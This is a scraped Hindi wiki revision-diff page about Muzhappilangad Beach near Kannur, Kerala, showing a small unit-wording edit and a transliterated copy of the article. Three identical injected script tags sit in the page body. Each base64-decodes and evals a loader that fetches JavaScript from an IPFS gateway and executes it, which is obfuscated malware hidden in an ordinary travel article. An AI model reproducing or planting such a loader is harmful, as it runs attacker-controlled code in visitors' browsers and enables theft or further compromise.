Difference between revisions of "मुजुपिलंगड बीच कन्नूर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
m (Text replace - "किमी." to "किलोमीटर")
Line 1: Line 1:
 
[[चित्र:Muzhappilangad-Beach-Kannur.jpg|thumb|250px|मुजुपिलंगड बीच, [[कन्नूर]]<br />Muzhappilangad Beach, Kannur]]
 
[[चित्र:Muzhappilangad-Beach-Kannur.jpg|thumb|250px|मुजुपिलंगड बीच, [[कन्नूर]]<br />Muzhappilangad Beach, Kannur]]
 
*[[केरल]] के शहर [[कन्नूर]] में कई [[कन्नूर पर्यटन|पर्यटन स्थल]] है जिनमें से एक मुजुपिलंगड बीच है।  
 
*[[केरल]] के शहर [[कन्नूर]] में कई [[कन्नूर पर्यटन|पर्यटन स्थल]] है जिनमें से एक मुजुपिलंगड बीच है।  
*4.5 किमी. लंबे मुजुपिलंगड बीच की सबसे बड़ी ख़ासियत यह है कि इसमें आसानी से ड्राईविंग की जा सकती है।
+
*4.5 किलोमीटर लंबे मुजुपिलंगड बीच की सबसे बड़ी ख़ासियत यह है कि इसमें आसानी से ड्राईविंग की जा सकती है।
 
*गाड़ियों के पहिए मुजुपिलंगड बीच के रेत में नहीं फंसते।  
 
*गाड़ियों के पहिए मुजुपिलंगड बीच के रेत में नहीं फंसते।  
 
*मुजुपिलंगड बीच मोइटू ब्रिज तक फैला हुआ है।
 
*मुजुपिलंगड बीच मोइटू ब्रिज तक फैला हुआ है।
 
*मुजुपिलंगड बीच तैराकी प्रिय लोगों का स्वर्ग कहा जाता है।  
 
*मुजुपिलंगड बीच तैराकी प्रिय लोगों का स्वर्ग कहा जाता है।  
*बीच कन्नूर के दक्षिण दिशा से 15 किमी. की दूरी पर है।  
+
*बीच कन्नूर के दक्षिण दिशा से 15 किलोमीटर की दूरी पर है।  
 
*जलक्रीडाओं की अनेक गतिविधियों का मुजुपिलंगड बीच में आनंद लिया जा सकता है।
 
*जलक्रीडाओं की अनेक गतिविधियों का मुजुपिलंगड बीच में आनंद लिया जा सकता है।
 
{{प्रचार}}
 
{{प्रचार}}

Revision as of 05:51, 30 March 2011

[[chitr:Muzhappilangad-Beach-Kannur.jpg|thumb|250px|mujupilangad bich, kannoor
Muzhappilangad Beach, Kannur]]

  • keral ke shahar kannoor mean kee paryatan sthal hai jinamean se ek mujupilangad bich hai.
  • 4.5 kilomitar lanbe mujupilangad bich ki sabase b di khasiyat yah hai ki isamean asani se draeeviang ki ja sakati hai.
  • ga diyoan ke pahie mujupilangad bich ke ret mean nahian phansate.
  • mujupilangad bich moitoo brij tak phaila hua hai.
  • mujupilangad bich tairaki priy logoan ka svarg kaha jata hai.
  • bich kannoor ke dakshin disha se 15 kilomitar ki doori par hai.
  • jalakridaoan ki anek gatividhiyoan ka mujupilangad bich mean anand liya ja sakata hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>